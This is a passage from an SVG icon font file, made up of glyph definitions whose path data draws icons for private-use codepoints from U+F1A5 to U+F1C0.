v-266q0 -178 -125.5 -303.5t-303.5 -125.5q-177 0 -303 124.5t-126 300.5v268l131 -61l195 58v-270q0 -42 30 -71.5t72 -29.5t72 29.5t30 71.5v275z" />
    <glyph glyph-name="_395" unicode="&#xf1a5;" 
d="M1472 160v480h-704v704h-480q-93 0 -158.5 -65.5t-65.5 -158.5v-480h704v-704h480q93 0 158.5 65.5t65.5 158.5zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5
t84.5 -203.5z" />
    <glyph glyph-name="_396" unicode="&#xf1a6;" horiz-adv-x="2048" 
d="M328 1254h204v-983h-532v697h328v286zM328 435v369h-123v-369h123zM614 968v-697h205v697h-205zM614 1254v-204h205v204h-205zM901 968h533v-942h-533v163h328v82h-328v697zM1229 435v369h-123v-369h123zM1516 968h532v-942h-532v163h327v82h-327v697zM1843 435v369h-123
v-369h123z" />
    <glyph glyph-name="_397" unicode="&#xf1a7;" 
d="M1046 516q0 -64 -38 -109t-91 -45q-43 0 -70 15v277q28 17 70 17q53 0 91 -45.5t38 -109.5zM703 944q0 -64 -38 -109.5t-91 -45.5q-43 0 -70 15v277q28 17 70 17q53 0 91 -45t38 -109zM1265 513q0 134 -88 229t-213 95q-20 0 -39 -3q-23 -78 -78 -136q-87 -95 -211 -101
v-636l211 41v206q51 -19 117 -19q125 0 213 95t88 229zM922 940q0 134 -88.5 229t-213.5 95q-74 0 -141 -36h-186v-840l211 41v206q55 -19 116 -19q125 0 213.5 95t88.5 229zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960
q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="_398" unicode="&#xf1a8;" horiz-adv-x="2038" 
d="M1222 607q75 3 143.5 -20.5t118 -58.5t101 -94.5t84 -108t75.5 -120.5q33 -56 78.5 -109t75.5 -80.5t99 -88.5q-48 -30 -108.5 -57.5t-138.5 -59t-114 -47.5q-44 37 -74 115t-43.5 164.5t-33 180.5t-42.5 168.5t-72.5 123t-122.5 48.5l-10 -2l-6 -4q4 -5 13 -14
q6 -5 28 -23.5t25.5 -22t19 -18t18 -20.5t11.5 -21t10.5 -27.5t4.5 -31t4 -40.5l1 -33q1 -26 -2.5 -57.5t-7.5 -52t-12.5 -58.5t-11.5 -53q-35 1 -101 -9.5t-98 -10.5q-39 0 -72 10q-2 16 -2 47q0 74 3 96q2 13 31.5 41.5t57 59t26.5 51.5q-24 2 -43 -24
q-36 -53 -111.5 -99.5t-136.5 -46.5q-25 0 -75.5 63t-106.5 139.5t-84 96.5q-6 4 -27 30q-482 -112 -513 -112q-16 0 -28 11t-12 27q0 15 8.5 26.5t22.5 14.5l486 106q-8 14 -8 25t5.5 17.5t16 11.5t20 7t23 4.5t18.5 4.5q4 1 15.5 7.5t17.5 6.5q15 0 28 -16t20 -33
q163 37 172 37q17 0 29.5 -11t12.5 -28q0 -15 -8.5 -26t-23.5 -14l-182 -40l-1 -16q-1 -26 81.5 -117.5t104.5 -91.5q47 0 119 80t72 129q0 36 -23.5 53t-51 18.5t-51 11.5t-23.5 34q0 16 10 34l-68 19q43 44 43 117q0 26 -5 58q82 16 144 16q44 0 71.5 -1.5t48.5 -8.5
t31 -13.5t20.5 -24.5t15.5 -33.5t17 -47.5t24 -60l50 25q-3 -40 -23 -60t-42.5 -21t-40 -6.5t-16.5 -20.5zM1282 842q-5 5 -13.5 15.5t-12 14.5t-10.5 11.5t-10 10.5l-8 8t-8.5 7.5t-8 5t-8.5 4.5q-7 3 -14.5 5t-20.5 2.5t-22 0.5h-32.5h-37.5q-126 0 -217 -43
q16 30 36 46.5t54 29.5t65.5 36t46 36.5t50 55t43.5 50.5q12 -9 28 -31.5t32 -36.5t38 -13l12 1v-76l22 -1q247 95 371 190q28 21 50 39t42.5 37.5t33 31t29.5 34t24 31t24.5 37t23 38t27 47.5t29.5 53l7 9q-2 -53 -43 -139q-79 -165 -205 -264t-306 -142q-14 -3 -42 -7.5
t-50 -9.5t-39 -14q3 -19 24.5 -46t21.5 -34q0 -11 -26 -30zM1061 -79q39 26 131.5 47.5t146.5 21.5q9 0 22.5 -15.5t28 -42.5t26 -50t24 -51t14.5 -33q-121 -45 -244 -45q-61 0 -125 11zM822 568l48 12l109 -177l-73 -48zM1323 51q3 -15 3 -16q0 -7 -17.5 -14.5t-46 -13
t-54 -9.5t-53.5 -7.5t-32 -4.5l-7 43q21 2 60.5 8.5t72 10t60.5 3.5h14zM866 679l-96 -20l-6 17q10 1 32.5 7t34.5 6q19 0 35 -10zM1061 45h31l10 -83l-41 -12v95zM1950 1535v1v-1zM1950 1535l-1 -5l-2 -2l1 3zM1950 1535l1 1z" />
    <glyph glyph-name="_399" unicode="&#xf1a9;" 
d="M1167 -50q-5 19 -24 5q-30 -22 -87 -39t-131 -17q-129 0 -193 49q-5 4 -13 4q-11 0 -26 -12q-7 -6 -7.5 -16t7.5 -20q34 -32 87.5 -46t102.5 -12.5t99 4.5q41 4 84.5 20.5t65 30t28.5 20.5q12 12 7 29zM1128 65q-19 47 -39 61q-23 15 -76 15q-47 0 -71 -10
q-29 -12 -78 -56q-26 -24 -12 -44q9 -8 17.5 -4.5t31.5 23.5q3 2 10.5 8.5t10.5 8.5t10 7t11.5 7t12.5 5t15 4.5t16.5 2.5t20.5 1q27 0 44.5 -7.5t23 -14.5t13.5 -22q10 -17 12.5 -20t12.5 1q23 12 14 34zM1483 346q0 22 -5 44.5t-16.5 45t-34 36.5t-52.5 14
q-33 0 -97 -41.5t-129 -83.5t-101 -42q-27 -1 -63.5 19t-76 49t-83.5 58t-100 49t-111 19q-115 -1 -197 -78.5t-84 -178.5q-2 -112 74 -164q29 -20 62.5 -28.5t103.5 -8.5q57 0 132 32.5t134 71t120 70.5t93 31q26 -1 65 -31.5t71.5 -67t68 -67.5t55.5 -32q35 -3 58.5 14
t55.5 63q28 41 42.5 101t14.5 106zM1536 506q0 -164 -62 -304.5t-166 -236t-242.5 -149.5t-290.5 -54t-293 57.5t-247.5 157t-170.5 241.5t-64 302q0 89 19.5 172.5t49 145.5t70.5 118.5t78.5 94t78.5 69.5t64.5 46.5t42.5 24.5q14 8 51 26.5t54.5 28.5t48 30t60.5 44
q36 28 58 72.5t30 125.5q129 -155 186 -193q44 -29 130 -68t129 -66q21 -13 39 -25t60.5 -46.5t76 -70.5t75 -95t69 -122t47 -148.5t19.5 -177.5z" />
    <glyph glyph-name="_400" unicode="&#xf1aa;" 
d="M1070 463l-160 -160l-151 -152l-30 -30q-65 -64 -151.5 -87t-171.5 -2q-16 -70 -72 -115t-129 -45q-85 0 -145 60.5t-60 145.5q0 72 44.5 128t113.5 72q-22 86 1 173t88 152l12 12l151 -152l-11 -11q-37 -37 -37 -89t37 -90q37 -37 89 -37t89 37l30 30l151 152l161 160z
M729 1145l12 -12l-152 -152l-12 12q-37 37 -89 37t-89 -37t-37 -89.5t37 -89.5l29 -29l152 -152l160 -160l-151 -152l-161 160l-151 152l-30 30q-68 67 -90 159.5t5 179.5q-70 15 -115 71t-45 129q0 85 60 145.5t145 60.5q76 0 133.5 -49t69.5 -123q84 20 169.5 -3.5
t149.5 -87.5zM1536 78q0 -85 -60 -145.5t-145 -60.5q-74 0 -131 47t-71 118q-86 -28 -179.5 -6t-161.5 90l-11 12l151 152l12 -12q37 -37 89 -37t89 37t37 89t-37 89l-30 30l-152 152l-160 160l152 152l160 -160l152 -152l29 -30q64 -64 87.5 -150.5t2.5 -171.5
q76 -11 126.5 -68.5t50.5 -134.5zM1534 1202q0 -77 -51 -135t-127 -69q26 -85 3 -176.5t-90 -158.5l-12 -12l-151 152l12 12q37 37 37 89t-37 89t-89 37t-89 -37l-30 -30l-152 -152l-160 -160l-152 152l161 160l152 152l29 30q67 67 159 89.5t178 -3.5q11 75 68.5 126
t135.5 51q85 0 145 -60.5t60 -145.5z" />
    <glyph glyph-name="f1ab" unicode="&#xf1ab;" 
d="M654 458q-1 -3 -12.5 0.5t-31.5 11.5l-20 9q-44 20 -87 49q-7 5 -41 31.5t-38 28.5q-67 -103 -134 -181q-81 -95 -105 -110q-4 -2 -19.5 -4t-18.5 0q6 4 82 92q21 24 85.5 115t78.5 118q17 30 51 98.5t36 77.5q-8 1 -110 -33q-8 -2 -27.5 -7.5t-34.5 -9.5t-17 -5
q-2 -2 -2 -10.5t-1 -9.5q-5 -10 -31 -15q-23 -7 -47 0q-18 4 -28 21q-4 6 -5 23q6 2 24.5 5t29.5 6q58 16 105 32q100 35 102 35q10 2 43 19.5t44 21.5q9 3 21.5 8t14.5 5.5t6 -0.5q2 -12 -1 -33q0 -2 -12.5 -27t-26.5 -53.5t-17 -33.5q-25 -50 -77 -131l64 -28
q12 -6 74.5 -32t67.5 -28q4 -1 10.5 -25.5t4.5 -30.5zM449 944q3 -15 -4 -28q-12 -23 -50 -38q-30 -12 -60 -12q-26 3 -49 26q-14 15 -18 41l1 3q3 -3 19.5 -5t26.5 0t58 16q36 12 55 14q17 0 21 -17zM1147 815l63 -227l-139 42zM39 15l694 232v1032l-694 -233v-1031z
M1280 332l102 -31l-181 657l-100 31l-216 -536l102 -31l45 110l211 -65zM777 1294l573 -184v380zM1088 -29l158 -13l-54 -160l-40 66q-130 -83 -276 -108q-58 -12 -91 -12h-84q-79 0 -199.5 39t-183.5 85q-8 7 -8 16q0 8 5 13.5t13 5.5q4 0 18 -7.5t30.5 -16.5t20.5 -11
q73 -37 159.5 -61.5t157.5 -24.5q95 0 167 14.5t157 50.5q15 7 30.5 15.5t34 19t28.5 16.5zM1536 1050v-1079l-774 246q-14 -6 -375 -127.5t-368 -121.5q-13 0 -18 13q0 1 -1 3v1078q3 9 4 10q5 6 20 11q107 36 149 50v384l558 -198q2 0 160.5 55t316 108.5t161.5 53.5
q20 0 20 -21v-418z" />
    <glyph glyph-name="_402" unicode="&#xf1ac;" horiz-adv-x="1792" 
d="M288 1152q66 0 113 -47t47 -113v-1088q0 -66 -47 -113t-113 -47h-128q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h128zM1664 989q58 -34 93 -93t35 -128v-768q0 -106 -75 -181t-181 -75h-864q-66 0 -113 47t-47 113v1536q0 40 28 68t68 28h672q40 0 88 -20t76 -48
l152 -152q28 -28 48 -76t20 -88v-163zM928 0v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM928 256v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM928 512v128q0 14 -9 23
t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1184 0v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1184 256v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128
q14 0 23 9t9 23zM1184 512v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1440 0v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1440 256v128q0 14 -9 23t-23 9h-128
q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1440 512v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1536 896v256h-160q-40 0 -68 28t-28 68v160h-640v-512h896z" />
    <glyph glyph-name="_403" unicode="&#xf1ad;" 
d="M1344 1536q26 0 45 -19t19 -45v-1664q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v1664q0 26 19 45t45 19h1280zM512 1248v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23zM512 992v-64q0 -14 9 -23t23 -9h64q14 0 23 9
t9 23v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23zM512 736v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23zM512 480v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23zM384 160v64
q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM384 416v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM384 672v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64
q14 0 23 9t9 23zM384 928v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM384 1184v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM896 -96v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9
t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM896 416v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM896 672v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM896 928v64
q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM896 1184v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1152 160v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64
q14 0 23 9t9 23zM1152 416v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1152 672v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1152 928v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9
t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1152 1184v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23z" />
    <glyph glyph-name="_404" unicode="&#xf1ae;" horiz-adv-x="1280" 
d="M1188 988l-292 -292v-824q0 -46 -33 -79t-79 -33t-79 33t-33 79v384h-64v-384q0 -46 -33 -79t-79 -33t-79 33t-33 79v824l-292 292q-28 28 -28 68t28 68q29 28 68.5 28t67.5 -28l228 -228h368l228 228q28 28 68 28t68 -28q28 -29 28 -68.5t-28 -67.5zM864 1152
q0 -93 -65.5 -158.5t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5z" />
    <glyph glyph-name="uniF1B1" unicode="&#xf1b0;" horiz-adv-x="1664" 
d="M780 1064q0 -60 -19 -113.5t-63 -92.5t-105 -39q-76 0 -138 57.5t-92 135.5t-30 151q0 60 19 113.5t63 92.5t105 39q77 0 138.5 -57.5t91.5 -135t30 -151.5zM438 581q0 -80 -42 -139t-119 -59q-76 0 -141.5 55.5t-100.5 133.5t-35 152q0 80 42 139.5t119 59.5
q76 0 141.5 -55.5t100.5 -134t35 -152.5zM832 608q118 0 255 -97.5t229 -237t92 -254.5q0 -46 -17 -76.5t-48.5 -45t-64.5 -20t-76 -5.5q-68 0 -187.5 45t-182.5 45q-66 0 -192.5 -44.5t-200.5 -44.5q-183 0 -183 146q0 86 56 191.5t139.5 192.5t187.5 146t193 59zM1071 819
q-61 0 -105 39t-63 92.5t-19 113.5q0 74 30 151.5t91.5 135t138.5 57.5q61 0 105 -39t63 -92.5t19 -113.5q0 -73 -30 -151t-92 -135.5t-138 -57.5zM1503 923q77 0 119 -59.5t42 -139.5q0 -74 -35 -152t-100.5 -133.5t-141.5 -55.5q-77 0 -119 59t-42 139q0 74 35 152.5
t100.5 134t141.5 55.5z" />
    <glyph glyph-name="_406" unicode="&#xf1b1;" horiz-adv-x="768" 
d="M704 1008q0 -145 -57 -243.5t-152 -135.5l45 -821q2 -26 -16 -45t-44 -19h-192q-26 0 -44 19t-16 45l45 821q-95 37 -152 135.5t-57 243.5q0 128 42.5 249.5t117.5 200t160 78.5t160 -78.5t117.5 -200t42.5 -249.5z" />
    <glyph glyph-name="_407" unicode="&#xf1b2;" horiz-adv-x="1792" 
d="M896 -93l640 349v636l-640 -233v-752zM832 772l698 254l-698 254l-698 -254zM1664 1024v-768q0 -35 -18 -65t-49 -47l-704 -384q-28 -16 -61 -16t-61 16l-704 384q-31 17 -49 47t-18 65v768q0 40 23 73t61 47l704 256q22 8 44 8t44 -8l704 -256q38 -14 61 -47t23 -73z
" />
    <glyph glyph-name="_408" unicode="&#xf1b3;" horiz-adv-x="2304" 
d="M640 -96l384 192v314l-384 -164v-342zM576 358l404 173l-404 173l-404 -173zM1664 -96l384 192v314l-384 -164v-342zM1600 358l404 173l-404 173l-404 -173zM1152 651l384 165v266l-384 -164v-267zM1088 1030l441 189l-441 189l-441 -189zM2176 512v-416q0 -36 -19 -67
t-52 -47l-448 -224q-25 -14 -57 -14t-57 14l-448 224q-4 2 -7 4q-2 -2 -7 -4l-448 -224q-25 -14 -57 -14t-57 14l-448 224q-33 16 -52 47t-19 67v416q0 38 21.5 70t56.5 48l434 186v400q0 38 21.5 70t56.5 48l448 192q23 10 50 10t50 -10l448 -192q35 -16 56.5 -48t21.5 -70
v-400l434 -186q36 -16 57 -48t21 -70z" />
    <glyph glyph-name="_409" unicode="&#xf1b4;" horiz-adv-x="2048" 
d="M1848 1197h-511v-124h511v124zM1596 771q-90 0 -146 -52.5t-62 -142.5h408q-18 195 -200 195zM1612 186q63 0 122 32t76 87h221q-100 -307 -427 -307q-214 0 -340.5 132t-126.5 347q0 208 130.5 345.5t336.5 137.5q138 0 240.5 -68t153 -179t50.5 -248q0 -17 -2 -47h-658
q0 -111 57.5 -171.5t166.5 -60.5zM277 236h296q205 0 205 167q0 180 -199 180h-302v-347zM277 773h281q78 0 123.5 36.5t45.5 113.5q0 144 -190 144h-260v-294zM0 1282h594q87 0 155 -14t126.5 -47.5t90 -96.5t31.5 -154q0 -181 -172 -263q114 -32 172 -115t58 -204
q0 -75 -24.5 -136.5t-66 -103.5t-98.5 -71t-121 -42t-134 -13h-611v1260z" />
    <glyph glyph-name="_410" unicode="&#xf1b5;" 
d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960zM499 1041h-371v-787h382q117 0 197 57.5t80 170.5q0 158 -143 200q107 52 107 164q0 57 -19.5 96.5
t-56.5 60.5t-79 29.5t-97 8.5zM477 723h-176v184h163q119 0 119 -90q0 -94 -106 -94zM486 388h-185v217h189q124 0 124 -113q0 -104 -128 -104zM1136 356q-68 0 -104 38t-36 107h411q1 10 1 30q0 132 -74.5 220.5t-203.5 88.5q-128 0 -210 -86t-82 -216q0 -135 79 -217
t213 -82q205 0 267 191h-138q-11 -34 -47.5 -54t-75.5 -20zM1126 722q113 0 124 -122h-254q4 56 39 89t91 33zM964 988h319v-77h-319v77z" />
    <glyph glyph-name="_411" unicode="&#xf1b6;" horiz-adv-x="1792" 
d="M1582 954q0 -101 -71.5 -172.5t-172.5 -71.5t-172.5 71.5t-71.5 172.5t71.5 172.5t172.5 71.5t172.5 -71.5t71.5 -172.5zM812 212q0 104 -73 177t-177 73q-27 0 -54 -6l104 -42q77 -31 109.5 -106.5t1.5 -151.5q-31 -77 -107 -109t-152 -1q-21 8 -62 24.5t-61 24.5
q32 -60 91 -96.5t130 -36.5q104 0 177 73t73 177zM1642 953q0 126 -89.5 215.5t-215.5 89.5q-127 0 -216.5 -89.5t-89.5 -215.5q0 -127 89.5 -216t216.5 -89q126 0 215.5 89t89.5 216zM1792 953q0 -189 -133.5 -322t-321.5 -133l-437 -319q-12 -129 -109 -218t-229 -89
q-121 0 -214 76t-118 192l-230 92v429l389 -157q79 48 173 48q13 0 35 -2l284 407q2 187 135.5 319t320.5 132q188 0 321.5 -133.5t133.5 -321.5z" />
    <glyph glyph-name="_412" unicode="&#xf1b7;" 
d="M1242 889q0 80 -57 136.5t-137 56.5t-136.5 -57t-56.5 -136q0 -80 56.5 -136.5t136.5 -56.5t137 56.5t57 136.5zM632 301q0 -83 -58 -140.5t-140 -57.5q-56 0 -103 29t-72 77q52 -20 98 -40q60 -24 120 1.5t85 86.5q24 60 -1.5 120t-86.5 84l-82 33q22 5 42 5
q82 0 140 -57.5t58 -140.5zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v153l172 -69q20 -92 93.5 -152t168.5 -60q104 0 181 70t87 173l345 252q150 0 255.5 105.5t105.5 254.5q0 150 -105.5 255.5t-255.5 105.5
q-148 0 -253 -104.5t-107 -252.5l-225 -322q-9 1 -28 1q-75 0 -137 -37l-297 119v468q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5zM1289 887q0 -100 -71 -170.5t-171 -70.5t-170.5 70.5t-70.5 170.5t70.5 171t170.5 71q101 0 171.5 -70.5t70.5 -171.5z
" />
    <glyph glyph-name="_413" unicode="&#xf1b8;" horiz-adv-x="1792" 
d="M836 367l-15 -368l-2 -22l-420 29q-36 3 -67 31.5t-47 65.5q-11 27 -14.5 55t4 65t12 55t21.5 64t19 53q78 -12 509 -28zM449 953l180 -379l-147 92q-63 -72 -111.5 -144.5t-72.5 -125t-39.5 -94.5t-18.5 -63l-4 -21l-190 357q-17 26 -18 56t6 47l8 18q35 63 114 188
l-140 86zM1680 436l-188 -359q-12 -29 -36.5 -46.5t-43.5 -20.5l-18 -4q-71 -7 -219 -12l8 -164l-230 367l211 362l7 -173q170 -16 283 -5t170 33zM895 1360q-47 -63 -265 -435l-317 187l-19 12l225 356q20 31 60 45t80 10q24 -2 48.5 -12t42 -21t41.5 -33t36 -34.5
t36 -39.5t32 -35zM1550 1053l212 -363q18 -37 12.5 -76t-27.5 -74q-13 -20 -33 -37t-38 -28t-48.5 -22t-47 -16t-51.5 -14t-46 -12q-34 72 -265 436l313 195zM1407 1279l142 83l-220 -373l-419 20l151 86q-34 89 -75 166t-75.5 123.5t-64.5 80t-47 46.5l-17 13l405 -1
q31 3 58 -10.5t39 -28.5l11 -15q39 -61 112 -190z" />
    <glyph glyph-name="_414" unicode="&#xf1b9;" horiz-adv-x="2048" 
d="M480 448q0 66 -47 113t-113 47t-113 -47t-47 -113t47 -113t113 -47t113 47t47 113zM516 768h1016l-89 357q-2 8 -14 17.5t-21 9.5h-768q-9 0 -21 -9.5t-14 -17.5zM1888 448q0 66 -47 113t-113 47t-113 -47t-47 -113t47 -113t113 -47t113 47t47 113zM2048 544v-384
q0 -14 -9 -23t-23 -9h-96v-128q0 -80 -56 -136t-136 -56t-136 56t-56 136v128h-1024v-128q0 -80 -56 -136t-136 -56t-136 56t-56 136v128h-96q-14 0 -23 9t-9 23v384q0 93 65.5 158.5t158.5 65.5h28l105 419q23 94 104 157.5t179 63.5h768q98 0 179 -63.5t104 -157.5
l105 -419h28q93 0 158.5 -65.5t65.5 -158.5z" />
    <glyph glyph-name="_415" unicode="&#xf1ba;" horiz-adv-x="2048" 
d="M1824 640q93 0 158.5 -65.5t65.5 -158.5v-384q0 -14 -9 -23t-23 -9h-96v-64q0 -80 -56 -136t-136 -56t-136 56t-56 136v64h-1024v-64q0 -80 -56 -136t-136 -56t-136 56t-56 136v64h-96q-14 0 -23 9t-9 23v384q0 93 65.5 158.5t158.5 65.5h28l105 419q23 94 104 157.5
t179 63.5h128v224q0 14 9 23t23 9h448q14 0 23 -9t9 -23v-224h128q98 0 179 -63.5t104 -157.5l105 -419h28zM320 160q66 0 113 47t47 113t-47 113t-113 47t-113 -47t-47 -113t47 -113t113 -47zM516 640h1016l-89 357q-2 8 -14 17.5t-21 9.5h-768q-9 0 -21 -9.5t-14 -17.5z
M1728 160q66 0 113 47t47 113t-47 113t-113 47t-113 -47t-47 -113t47 -113t113 -47z" />
    <glyph glyph-name="_416" unicode="&#xf1bb;" 
d="M1504 64q0 -26 -19 -45t-45 -19h-462q1 -17 6 -87.5t5 -108.5q0 -25 -18 -42.5t-43 -17.5h-320q-25 0 -43 17.5t-18 42.5q0 38 5 108.5t6 87.5h-462q-26 0 -45 19t-19 45t19 45l402 403h-229q-26 0 -45 19t-19 45t19 45l402 403h-197q-26 0 -45 19t-19 45t19 45l384 384
q19 19 45 19t45 -19l384 -384q19 -19 19 -45t-19 -45t-45 -19h-197l402 -403q19 -19 19 -45t-19 -45t-45 -19h-229l402 -403q19 -19 19 -45z" />
    <glyph glyph-name="_417" unicode="&#xf1bc;" 
d="M1127 326q0 32 -30 51q-193 115 -447 115q-133 0 -287 -34q-42 -9 -42 -52q0 -20 13.5 -34.5t35.5 -14.5q5 0 37 8q132 27 243 27q226 0 397 -103q19 -11 33 -11q19 0 33 13.5t14 34.5zM1223 541q0 40 -35 61q-237 141 -548 141q-153 0 -303 -42q-48 -13 -48 -64
q0 -25 17.5 -42.5t42.5 -17.5q7 0 37 8q122 33 251 33q279 0 488 -124q24 -13 38 -13q25 0 42.5 17.5t17.5 42.5zM1331 789q0 47 -40 70q-126 73 -293 110.5t-343 37.5q-204 0 -364 -47q-23 -7 -38.5 -25.5t-15.5 -48.5q0 -31 20.5 -52t51.5 -21q11 0 40 8q133 37 307 37
q159 0 309.5 -34t253.5 -95q21 -12 40 -12q29 0 50.5 20.5t21.5 51.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="_418" unicode="&#xf1bd;" horiz-adv-x="1024" 
d="M1024 1233l-303 -582l24 -31h279v-415h-507l-44 -30l-142 -273l-30 -30h-301v303l303 583l-24 30h-279v415h507l44 30l142 273l30 30h301v-303z" />
    <glyph glyph-name="_419" unicode="&#xf1be;" horiz-adv-x="2304" 
d="M784 164l16 241l-16 523q-1 10 -7.5 17t-16.5 7q-9 0 -16 -7t-7 -17l-14 -523l14 -241q1 -10 7.5 -16.5t15.5 -6.5q22 0 24 23zM1080 193l11 211l-12 586q0 16 -13 24q-8 5 -16 5t-16 -5q-13 -8 -13 -24l-1 -6l-10 -579q0 -1 11 -236v-1q0 -10 6 -17q9 -11 23 -11
q11 0 20 9q9 7 9 20zM35 533l20 -128l-20 -126q-2 -9 -9 -9t-9 9l-17 126l17 128q2 9 9 9t9 -9zM121 612l26 -207l-26 -203q-2 -9 -10 -9q-9 0 -9 10l-23 202l23 207q0 9 9 9q8 0 10 -9zM401 159zM213 650l25 -245l-25 -237q0 -11 -11 -11q-10 0 -12 11l-21 237l21 245
q2 12 12 12q11 0 11 -12zM307 657l23 -252l-23 -244q-2 -13 -14 -13q-13 0 -13 13l-21 244l21 252q0 13 13 13q12 0 14 -13zM401 639l21 -234l-21 -246q-2 -16 -16 -16q-6 0 -10.5 4.5t-4.5 11.5l-20 246l20 234q0 6 4.5 10.5t10.5 4.5q14 0 16 -15zM784 164zM495 785
l21 -380l-21 -246q0 -7 -5 -12.5t-12 -5.5q-16 0 -18 18l-18 246l18 380q2 18 18 18q7 0 12 -5.5t5 -12.5zM589 871l19 -468l-19 -244q0 -8 -5.5 -13.5t-13.5 -5.5q-18 0 -20 19l-16 244l16 468q2 19 20 19q8 0 13.5 -5.5t5.5 -13.5zM687 911l18 -506l-18 -242
q-2 -21 -22 -21q-19 0 -21 21l-16 242l16 506q0 9 6.5 15.5t14.5 6.5q9 0 15 -6.5t7 -15.5zM1079 169v0v0v0zM881 915l15 -510l-15 -239q0 -10 -7.5 -17.5t-17.5 -7.5t-17 7t-8 18l-14 239l14 510q0 11 7.5 18t17.5 7t17.5 -7t7.5 -18zM980 896l14 -492l-14 -236
q0 -11 -8 -19t-19 -8t-19 8t-9 19l-12 236l12 492q1 12 9 20t19 8t18.5 -8t8.5 -20zM1192 404l-14 -231v0q0 -13 -9 -22t-22 -9t-22 9t-10 22l-6 114l-6 117l12 636v3q2 15 12 24q9 7 20 7q8 0 15 -5q14 -8 16 -26zM2304 423q0 -117 -83 -199.5t-200 -82.5h-786
q-13 2 -22 11t-9 22v899q0 23 28 33q85 34 181 34q195 0 338 -131.5t160 -323.5q53 22 110 22q117 0 200 -83t83 -201z" />
    <glyph glyph-name="uniF1C0" unicode="&#xf1c0;" 
d="M768 768q237 0 443 43t325 127v-170q0 -69 -103 -128t-280 -93.5t-385 -34.5t-385 34.5t-280 93.5t-103 128v170q119 -84 325 -127t443 -43zM768 0q237 0 443 43t325 127v-170q0 -69 -103 -128t-280 -93.5t-385 -34.5t-385 34.5t-280 93.5t-103 128v170q119 -84 325 -127
